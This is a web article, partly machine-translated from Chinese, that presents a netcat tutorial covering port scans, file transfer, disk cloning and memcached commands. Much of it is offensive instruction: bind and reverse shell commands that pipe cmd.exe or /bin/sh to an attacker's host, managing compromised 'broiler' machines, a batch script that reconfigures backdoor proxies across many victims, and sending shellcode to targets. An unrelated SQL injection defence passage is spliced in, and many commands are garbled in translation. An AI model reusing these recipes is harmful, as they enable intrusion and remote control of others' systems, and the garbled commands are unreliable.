Shulou(Shulou.com)06/02 Report--

NC's full name is Netcat (Network knife) and the author is Hobbit & & ChrisWysopal. It is famous for its powerful function and small size, and is also known as "Swiss Army knife". Nc-TCP/IP swiss army knife

Nc is often used to overflow, backlink, upload text, and so on. It is actually a non-standard telnet client program. It is also a putty.exe client program.

Socat is a substitute for nc, which can be called nc++. It is N times the enhanced version of netcat. Socat supports many connection methods, such as ip, tcp, udp, ipv6, pipe, exec, system, open proxy, openssl, etc.

Function description: powerful network tool

Grammar: nc [- hlnruz] [- g] [- G] [- I] [- o] [- p]

[- s] [- v.] [- w] [host name] [communication port.]

Parameters:

-g set up router hop communication gateways, up to 8.

-G sets the source route director, whose value is a multiple of 4.

-h online help.

-I set the time interval to transmit information and scan the communication port.

-l listening mode, which is used for inbound connections (listening on local ports).

-n use the IP address directly, not through the domain name server.

-o specify the name of the file and dump the data transferred back and forth into the file in hexadecimal code.

-p sets the communication port used by the local host.

-r randomly specify the communication port between the local and remote host.

-s sets the IP address of the packet sent by the local host.

-u uses the UDP transport protocol.

-v shows the instruction execution process.

-w sets the time to wait for connection.

-z uses 0 input / output mode and is used only when scanning communication ports.

[root@hatest1 ~] # type-a ncnc is / usr/bin/nc [root@hatest1 ~] # rpm-Q ncnc-1.10-22

1) Port scan

Nc-v-z host.example.com 70-80 # scan port (70 to 80), range can be specified. -v outputs details. Nc-v-w 1 192.168.228.222-z 1-1000root@~# nc-v-w 2 192.168.2.34-z 21-24 # you can also try the effect without the-z parameter nc: connect to 192.168.34 port 21 (tcp) failed: Connection refusedConnection to 192.168.2.34 22 port [tcp/ssh] succeeededprincipnc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refusednc: connect to 192.168.2 .34 port 24 (tcp) failed: Connection refusedroot@10.1.1.43:~# nc-v-z-w2 127.0.0.1 1-100root@10.1.1.43:~# nc-v-w 10 10.1.1.180 80root@10.1.1.43:~# nc-v-w 10 10.1.1.180-z 80-3000 listening on local port root@10.1.1.43:~# nc-l-p 1234 root @ 10.1.1.43 netstat-tunlp | grep 1234tcp 0 0 0.0.0 0 grep 1234tcp 1234 0.0 0 LISTEN 15543/nc# Test UDP port root@172.16.211.34:web# netstat-tunlpActive Internet connections (only servers) grep 1234tcp 0 0 0.0.0 grep 1234tcp 22 0 .0.0.0: * LISTEN 1111/sshd udp 0 0 0.0.0.0 68Connection to 68 0.0.0.0 887/dhclient root@172.16.211.35:~# nc-vuz 172.16.211.34 68Connection to 172.16.211.34 68 port [udp/bootpc] succededprincipnc-p 1234-w 5 host.example.com 80

Establish a port 80 connection from local port 1234 to host.example.com, with a 5 second timeout

Nc-u host.example.com 53

U is a UDP connection

2) copy files remotely

Copy files from server1 to server2.

First on server2, activate listening with nc, and run on server2:

[root@hatest2 tmp] # nc-lp 1234 > install.log

Run on server1:

[root@hatest1] # ll install.log-rw-r--r-- 1 root root 39693 December 20 2007 install.log [root@hatest1] # nc-w 1 192.168.228.222 1234

< install.log 目的主机监听 nc -l 监听端口 >

The file name to receive is nc-l 4444 > cache.tar.gz

The source host initiates a request

Nc destination host ip destination port nc 192.168.0.85 4444

Netstat is as follows

[root@localhost jiangbao] # netstat-tplntcp 0 0 0.0.0.0 LISTEN 18166/nc 4444 0.0.0.0

Directory transfer

Copy the contents of the nginx-0.6.34 directory from server1 to server2.

First on server2, activate listening with nc, and run on server2:

[root@hatest2 tmp] # nc-l 1234 | tar xzvf-

Run on server1:

[

Root@hatest1 ~] # ll-d nginx-0.6.34drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34 [root@hatest1 ~] # tar czvf-nginx-0.6.34 | nc 192.168.228.222 1234

Copy files from 192.168.2.33 to 192.168.2.34

On 192.168.2.34: nc-l 1234 > test.txt

On 192.168.2.33: nc 192.168.2.34

< test.txt 克隆硬盘或分区 操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。 克隆硬盘或分区的操作，不应在已经mount的的系统上进行。 所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工具光盘）启动系统后，在server2上进行类似的监听动作： # nc -l -p 1234 | dd of=/dev/sda server1上执行传输，即可完成从server1克隆sda硬盘到server2的任务： # dd if=/dev/sda | nc 192.168.228.222 1234 3) 简单聊天工具 在192.168.2.34上： nc -l 1234 在192.168.2.33上： nc 192.168.2.34 1234 这样，双方就可以相互交流了。使用ctrl+C(或D）退出。 nc -l 1234nc 127.0.0.1 1234 在端口1234建立连接，互相发送输入 4) 保存Web页面 # while true; do nc -l -p 80 -q 1 < somepage.html; done 5) 模拟HTTP Headers [root@hatest1 ~]# nc www.linuxfly.org 80 GET / HTTP/1.1 Host: ispconfig.org Referrer: mypage.com User-Agent: my-browserHTTP/1.1 200 OK Date: Tue, 16 Dec 2008 07:23:24 GMT Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8 Set-Cookie: PHPSESSID=bbadorbvie1gn037iih7lrdg50; path=/ Expires: 0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Cache-Control: private, post-check=0, pre-check=0, max-age=0 Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/ Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html [......] 在nc命令后，输入红色部分的内容，然后按两次回车，即可从对方获得HTTP Headers内容。 echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80 连接到主机并执行 6) 用nc命令操作memcached 1）存储数据：printf "set key 0 10 6rnresultrn" |nc 192.168.2.34 11211 2）获取数据：printf "get keyrn" |nc 192.168.2.34 11211 3）删除数据：printf "delete keyrn" |nc 192.168.2.34 11211 4）查看状态：printf "statsrn" |nc 192.168.2.34 11211 5）模拟top命令查看状态：watch "echo stats" |nc 192.168.2.34 11211 6）清空缓存：printf "flush_allrn" |nc 192.168.2.34 11211 (小心操作，清空了缓存就没了） 补充教程 2 nc的使用方法 netcat被誉为网络安全界的'瑞士军刀'，相信没有什么人不认识它吧...... 一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由'红与黑'编译后的新'浓缩'版。'浓缩'版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法，有此功能的原版NC好象要60KB：P），虽然"体积"小，但很完成很多工作。 软件介绍： 工具名：Netcat 作者：Hobbit && Chris Wysopal 网址：http://www.atstake.com/research/tools/network_utilities/ 类别：开放源码 平台：Linux/BSD/Unix/Windows WINDOWS下版本号：[v1.10 NT] 参数介绍： nc.exe -h 即可看到各参数的使用方法。 基本格式：nc [-options] hostname port[s] [ports] ... nc -l -p port [options] [hostname] [port] -d 后台模式 -e 程序重定向，一旦连接，就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 设置路由器跃程通信网关，最多可设置8个。 -G num source-routing pointer: 4, 8, 12, ... 设置来源路由指向器，其数值为4的倍数。 -h 帮助信息 -i secs 延时的间隔 -l 监听模式，用于入站连接 (监听本地端口) -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址，不能用hostname。即直接使用IP地址，而不通过域名服务器。 -o file 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。 -p port 本地端口号 (指定本地端口 ) -r 随机本地及远程端口 -s addr 本地源地址 -t 使用TELNET交互方式(用telnet来回应 ) -u UDP模式 -v 详细输出--用两个-v( -vv)可得到更详细的内容. 获得端口信息 -w secs timeout的时间 -z 将输入输出关掉--只用于扫描. 端口的表示方法可写为M-N的范围格式。 基本用法： 大概有以下几种用法： 1) 连接到 remote 主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的TCP80端口 2) 监听 local 主机，例子： 格式：nc -l -p 80 讲解：监听本机的TCP80端口 3) 扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描192.168.x.x的TCP80到TCP445的所有端口 4) remote 主机绑定 shell，例子： 格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5) REMOTE主机绑定SHELL并反向连接，例子： 格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法（其实NC的用法还有很多，当配合管道命令"|"与重定向命令""等等命令功能更强大......）。 高级用法： 6) 作攻击程序用，例子： 格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2：nc -nvv 192.168.x.x 80 < c:exploit.txt 讲解：连接到192.168.x.x的80端口，并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果，真是有异曲同工之妙:P) 附：c:exploit.txt为shellcode等 7) 作蜜罐用[1]，例子： 格式：nc -L -p 80 讲解：使用-L(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止. 8) 作蜜罐用[2]，例子： 格式：nc -L -p 80 >

C:log.txt

Explanation: use-L to keep listening to a port until ctrl+c, and output the results to c:log.txt. If you change'>'to'> >', you can append logs.

Attached: c:log.txt is log, etc.

9) used as a honeypot [3], for example:

Format 1:nc-L-p 80

< c:honeypot.txt 格式2：type.exe c:honeypot.txt|nc -L -p 80 讲解：使用-L可以不停地监听某一个端口，直到ctrl+c为止，并把c:honeypot.txt的内容'送'入其管道中。 如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询，他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能， 欺骗系统授予访问权限。系统环境不同，攻击者可能造成的损害也不同，这主要由应用访问数据库的安全权限决定。 如果用户的帐户具有管理员或其他比较高级的权限，攻击者就可能对数据库的表执行各种他想要做的操作， 包括添加、删除或更新数据，甚至可能直接删除表。 二、如何防范？ 好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情，只要在利用表单输入的内容构造SQL命令之前，把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。 ⑴ 对于动态构造SQL查询的场合，可以使用下面的技术： 第一：替换单引号，即把所有单独出现的单引号改成两个单引号，防止攻击者修改SQL命令的含义。再来看前面的例子，"Select * from Users Where login = or 1=1 AND password = or 1=1"显然会得到与"Select * from Users Where login = or 1=1 AND password = or 1=1"不同的结果。 第二：删除用户输入内容中的所有连字符，防止攻击者构造出类如"Select * from Users Where login = mas -- AND password ="之类的查询，因为这类查询的后半部分已经被注释掉，不再有效，攻击者只要知道一个合法的用户登录名称，根本不需要知道用户的密码就可以顺利获得访问权限。 第三：对于用来执行查询的数据库帐户，限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作，因而也就防止了原本用于执行Select命令的地方却被用于执行Insert、Update或Delete命令。 ⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外，它还使得数据库权限可以限制到只允许特定的存储过程执行，所有的用户输入必须遵从被调用的存储过程的安全上下文，这样就很难再发生注入式攻击了。 ⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符，那么不要认可表单中输入的10个以上的字符，这将大大增加攻击者在SQL命令中插入有害代码的难度。 ⑷ 检查用户输入的合法性，确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行--之所以要执行服务器端验证，是为了弥补客户端验证机制脆弱的安全性。 在客户端，攻击者完全有可能获得网页的源代码，修改验证合法性的脚本（或者直接删除脚本），然后将非法内容通过修改后的表单提交给服务器。因此，要保证验证操作确实已经执行，唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象，例如RegularExpressionValidator，它们能够自动生成验证用的客户端脚本，当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象，你可以通过CustomValidator自己创建一个。 ⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据，然后再将它与数据库中保存的数据比较，这相当于对用户输入的数据进行了"消毒"处理，用户输入的数据不再对数据库有任何特殊的意义，从而也就防止了攻击者注入SQL命令。System.Web.Security.formsAuthentication类有一个HashPasswordForStoringInConfigFile，非常适合于对输入数据进行消毒处理。 ⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录，但实际返回的记录却超过一行，那就当作出错处理。 nc -l -v -p 7626 打开本地的7626端口进行监听，并反馈连接信息。 如果有扫描冰河木马的人会认为你中了木马开放了7626，和"小猪快跑"的功能有点象。再加个批处理文件一起用的话就是一个"小猪快跑"了。 nc -l -p 80 >

> c:\\ log. Dat

If you want to monitor whether there is an intrusion into local port 80, write it down and use this command. In this way, all attacks against local port 80 will be recorded.

Nc-l-p 123-e cmd.exe or nc-l-p 123-t

If you overflow into someone else's machine, you can run the above command. The function is to use cmd.exe to respond to the connection to port 123 on the machine.

This turns the spilled host into a telnet broiler. You can also use the command to let the broiler actively connect to your host, assuming that my IP is 192.168.0.1

Run on broilers: nc-e cmd.exe 192.168.0.1 777. Then run it on the local machine: nc-l-p 777

It means to ask the broiler to actively respond to cmd.exe (that is, a shell) to port 777 of your computer. If you listen to port 777 on the local computer again, you will enter the other party's cmd.

This is also a slight ten-hour rebound port Trojan horse principle.

Nc-v 192.168.0.2580

Get information about port 80 of 192.168.0.25. You can get a lot of important information such as the IIS version.

Nc-v-z 192.168.0.25 1-100

Scan the TCP port between 1 and 100 of 192.168.0.25

Nc-v-z-u 192.168.0.25 1-100

This is a scan of the UDP port between 1 and 00

Nc-vv ip port / / port spying: RIVER [192.168.0.198] 19190 (?) Open / / shows whether open is open or not

Scanner

Nc-vv-w 5 ip port-port port nc-vv-z ip port-port port

This scan will leave a large number of traces, the system administrator will be extra careful.

Backdoorism

Victim machine: / / victim's machine nc-l-p port-e cmd.exe / / win2000 nc-l-p port-e / bin/sh / / unix,linux attacker machine: / / attacker's machine. Nc ip-p port / / connects to victim_IP and gets a shell.

Reverse connection

Attacker machine: / / usually sql2.exe, remote overflow, webdavx3.exe attack. / / or reverse connection of wollf. Nc-vv-l-p port victim machine: nc-e cmd.exe attacker ip-p port nc-e / bin/sh attacker ip-p port

Or:

Attacker machine: nc-vv-l-p port1 nc-vv-l-p prot2 victim machine: nc attacker_ip port1 | cmd.exe | nc attacker_ip port2 nc attacker_ip port1 | / bin/sh | nc attacker_ip port2

The parameter-s (nc.exe-L-P139-d-e cmd.exe-s) should be added to ensure that nc.exe takes precedence over NETBIOS.

Transfer files:

Attacker machine path\ file.txt needs to be exited by Ctrl+C / / Broiler needs to be executed in the cmd.exe of gui interface (terminal login is not as convenient as installing FTP). Otherwise, there is no way to enter Crl+C.attacker machine-> victim machine / / upload command file to broiler nc-vv-l-p port > path\ file.txt requires Ctrl+C to exit nc-d victim_ip port

< path\filedest 　 可以shell执行 //这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆. 端口数据抓包. nc -vv -w 2 -o test.txt xfocus.Net 80 21-15< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error < 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr < 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized... < 00000084 83 00 00 01 8f # ..... telnet,自动批处理。 nc victim_ip port < path\file.cmd 　 显示执行过程. nc -vv victim_ip port < path\file.cmd 　 显示执行过程.nc -d victim_ip port < path\file.cmd 安静模式._______________file.cmd________________________ password cd %windir% echo []=[%windir%] c: cd \ md test cd /d %windir%\system32\ net stop sksockserver snake.exe -config port 11111 net start sksockserver exit _______________file.cmd__END___________________ ######################################## 管理肉鸡,更改肉鸡设置 ######################################## 1) 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver"，使用winshell后门. 端口1234 密码password 命令格式就是： modi.bat youip.txt___________modi.bat____________________________ @if "%1"=="" echo Error: no ip.txt &&goto END:start @echo password >

A.cmd @ echo s > > a.cmd @ echo cd / d% windir%%\ system32\ > > a.cmd @ net stop "sksockserver" > > a.cmd @ snake.exe-config port 11111 > > a.cmd @ net start "sksockserver" > > a.cmd @ exit > > a.cmd:auto @ for / f "eol=; tokens=1,2"% I in (% 1) do @ (nc.exe-vv-w 3% I 1234

< a.cmd):END ___________modi.bat__END_______________________ 2) @echo off color f0 :start cls C:\nc -vv -w 3 -l -p 80>

> 80.txt goto start

Run this batch after turning off the firewall, and the supervisor will hear a lot of messages to detect U vulnerabilities, mostly in groups of three-Nimda virus scans you.

In this way, you will get the broiler. Although the quality is not high. But it is also a cheap way.

Characteristics of broilers:

one. Unicode vulnerability

two. Guest password is empty, administrators group users

three. Other loopholes

Used to transfer files-ncp

#! / bin/sh # # is similar to rcp, but is done with netcat in high-end port # # do "ncp targetfile" on the machine that receives the file # # do "ncp sourcefile receivinghost" on the machine that sends the file # # if "nzp" is called, the transfer file will be compressed # # here define the port you want to use, and you are free to choose MYPORT=23456## if nc is not in the system path To remove the following line of comments, modify # PATH=$:$ The following lines of export PATH## check the input of parameters: test "$3" & & echo "too many args" & & exit 1 test! "$1" & & echo "no args?" & & exit 1 me= `echo $0 | sed slots. Test "$me" = "nzp" & & echo [compressed mode] # if second arg, its a host to send an [extant] file to. If test "$2"; then test!-f "$1" & & echo "cant find $1" & & exit 1 if test "$me" = "nzp"; then compress-c

< "$1" | nc -v -w 2 $2 $MYPORT && exit 0 else 　　nc -v -w 2 $2 $MYPORT < "$1" && exit 0 fi echo "transfer FAILED!" exit 1 fi# 是否在接收文件机器当前目录有同名文件if test -f "$1" ; then echo -n "Overwrite $1? " read aa test ! "$aa" = "y" && echo "[punted!]" && exit 1 fi # 30 seconds oughta be pleeeeenty of time, but change if you want. if test "$me" = "nzp" ; then # 注意这里nc的用法，结合了重定向符号和管道 nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c >

"$1" & & exit 0 else nc-v-w 30-p $MYPORT-l

< /dev/null >

"$1" & & exit 0 fi echo "transfer FAILED!" # clean up, since even if the transfer failed, $1 is already trashed rm-f "$1" exit 1

In that case, all I have to do is QuackA# ncp... / abcd on machine A.

Listening on and then on another machine B.

QuackB#ncp abcd 192.168.0.2 quackb [192.168.0.1] 23456 (?)

It appears on A machine.

Open connect to [192.168.0.2] from quackb [192.168.0.1] 1027 # check that the file transfer is complete.

=

[run locally] nc-v ip port

[command explanation] scan a port of an IP and return detailed output of information.

=

[local operation] nc-v-z ip port-port

[command explanation] scan the port of an IP to a port and return the detailed output of information, but the scanning speed is slow.

=

[local operation] nc-v-z-u ip port-port

[command explanation] scan a UDP port of an IP to a UDP port and return detailed output information, but the scanning speed is slow.

=

[local operation] nc-l-p 80

[command explanation] Open TCP port 80 of this machine and listen.

=

[local operation] nc-l-v-p 80

[command explanation] Open the local TCP port 80 and output the monitored information to the current CMD window.

=

[run locally] nc-l-p 80 > E:/log.dat

[command explanation] Open the local TCP port 80 and output the monitored information to the log file under E:/log.dat.

=

[local operation] nc-nvv 192.168.1.101 80

[command explanation] Connect to port 80 of the 192.168.1.101 host.

=

[local operation] nc-nvv-w2-z 192.168.1.101 80-1024

[command explanation] sweep port 80-1024 of anchor 192.168.1.101, and the connection timeout is 2 seconds.

=

[remote operation] nc-l-p 2012-t-e cmd.exe

[local operation] nc-nvv 192.168.1.101 2012

[command interpretation] using forward connection, run nc-l-p 2012-t-e cmd.exe on the remote host (note: suppose the IP address is 192.168.1.101), meaning to bind the CMD of the remote host to

[command explanation] port 2012, when the local host connects to the remote host successfully, it will return a CMD Shell to the local host; run nc-nvv 192.168.1.101 2012 on the local host for

[command explanation] connect to a remote host that has redirected CMD to port 2012 (note: assume the IP address is 192.168.1.101).

=

[local operation] nc-l-p 2012

[remote operation] nc-t-e cmd.exe 192.168.1.102 2012

[command explanation] using reverse connection, first run nc-l-p 2012 on the local host to open port 2012 of the local host (note: suppose the IP address is 192.168.1.102) and listen and wait for the remote host

[command explanation] machine connection; run nc-t-e cmd.exe 192.168.1.102 2012 on the remote host to redirect the CMD of the remote host to the IP address 192.168.1.102 port number is

[command explanation] on 2012 of the hosts, the host with the IP address of 192.168.1.102 gets a CMD Shell after a successful connection.

=

[local operation] nc-v-n ip port

< C:/sunzn.exe 【远程运行】nc -v -l -p port >

D:/sunzn.exe

[command interpretation] run nc-v-n ip port locally

< C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容，并把这些数据发送到远程主机的 【命令解释】对应端口上（注：命令行中的 IP 为接收文件的远程主机 IP ），在远程主机运行 nc -v -l -p port >

D:/sunzn.exe means to listen on the corresponding port and

[command interpretation] the received information data is written to D:/sunzn.exe, and two lines of commands realize the transfer of files between the local host and the remote host.

=

[local operation] nc-L-p 8989 e:\ log.dat nc-l-v-p port

Parameter explanation:

-l: listen for ports, listen for inbound information

-p: followed by the local port number

-v: displays information about the port, or more detailed information about the port if you use-vv

Tip: generally, everyone likes to use-vv.

Nc-l-p 80 / / this is very simple, listening on port 80. If this command is run on the machine, port 80 is considered open and can deceive the scanner

Nc-l-p 80 > e:\ log.dat / / write the details to the log file of disk E log.dat

Nc-l-v-p 80 / / is similar to the above command and displays information directly on the screen running NC.

Practice:

For example: nc-l-v-p 80

Then enter the native IP:127.0.0.1 in the browser

Command 2: program orientation (method of bouncing shell)

Nc-l-p port-t-e cmd.exe

Local machine: nc-l-p port or nc-l-v-p port

Target machine: nc-e cmd.exe ip port

Parameter explanation:

The two parameters-l and-p have been explained

-e; the function is program orientation

-t: reply in the form of telnet

Examples

Nc-l-p 5277-t-e cmd.exe / / never run on your own machine, if it does, your machine will become a TELNET server.

The command explains:

Listen for inbound information on local port 5277, and redirect the CMD.exe program to port 5277. When someone connects, let the program CMD.exe respond to the connection request in the form of TELNET. To put it bluntly, it is actually to make him a TELNET broiler, so this command should be run on your broiler.

For example, usage:

Local machine:nc-l-p port (or nc-l-v-p port) remote machine:nc-e cmd.exe ip port

As we all know, Grey Pigeon and God Thief, both of these tools use rebound port Trojans.

What is a bounce port?

That is to say, when the other party wins the horse, you do not have to take the initiative to connect with the other side, that is, you do not have to send a request connection from your client side to the server side running on the other side's host, but the other side takes the initiative to connect to you, which can invalidate many firewalls, because many firewalls do not check outbound requests.

After the two commands are combined here, it can be said that the two Trojans have the same effect.

Local operation: nc-l-p 5277 (listening on local port 5277) or nc-l-v-p 5277

Then on the remote machine, find a way to run nc-e cmd.exe ip 5277

(don't really hit "ip" on the broiler.) do, xxx.xxx.xxx.xxx!

This is the bounce ~ ~ get a SHELL on the local machine

Command 3: scan Port

Nc-v ip portnc-v-z ip port-portnc-v-z-u ip port-port

Parameter explanation:

-z: turn off the input and output and use it when scanning

Nc-v ip port / / this command scans for a port

For example:

Nc-v ip 135 / / scan the port of the remote host to get some simple information about the port, but for some ports, we can get more information

For example: Port 80

Nc-v ip 80 then uses the get method to get the information of the other party's WEB server

The command nc-v-z ip port-port / / is a command used to scan TCP ports quickly, while port-port specifies the range of ports to scan.

For example:

Nc-v-z ip 1-200 / / you can see the opening of the TCP port of 1-200 on my machine nc-v-z-u ip port-port / / this command has more-u than the last command. The function of this command is still to scan the port, just one more parameter of-u, which is used to scan the UDP port.

For example:

Nc-v-z-u ip 1-200 / / this command will scan the UDP port of 1-200

Command 4: transfer file (HOHO,I LIKE)

LOCAL MACHINE:nc-v-n ip port

< x:\svr.exeREMOTE MACHINE：nc -v -l -p port >

Y:\ svr.exe

Parameter explanation:

-n: the IP address of the specified number

The two commands are combined to transfer files.

First, run the command on the remote machine:

Nc-v-l-p 5277 > c:\ pulist.exe

Do you still remember this order? Ha ha, is it similar to monitoring commands? yes, that's right, this is monitoring port 5277.

And write the received information and data to c:\ pulist.exe

Run on the local machine at this time.

Nc-v-n ip 5277 < e:\ hack\ pulist.exe

This command means to read the contents of the pulist.exe file from the local E disk and directory and send the data to port 5277 of ip

In this way, the remote host automatically creates a pulist.exe file.

The above is the whole content of this article, I hope it will be helpful to your study, and I also hope that you will support it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.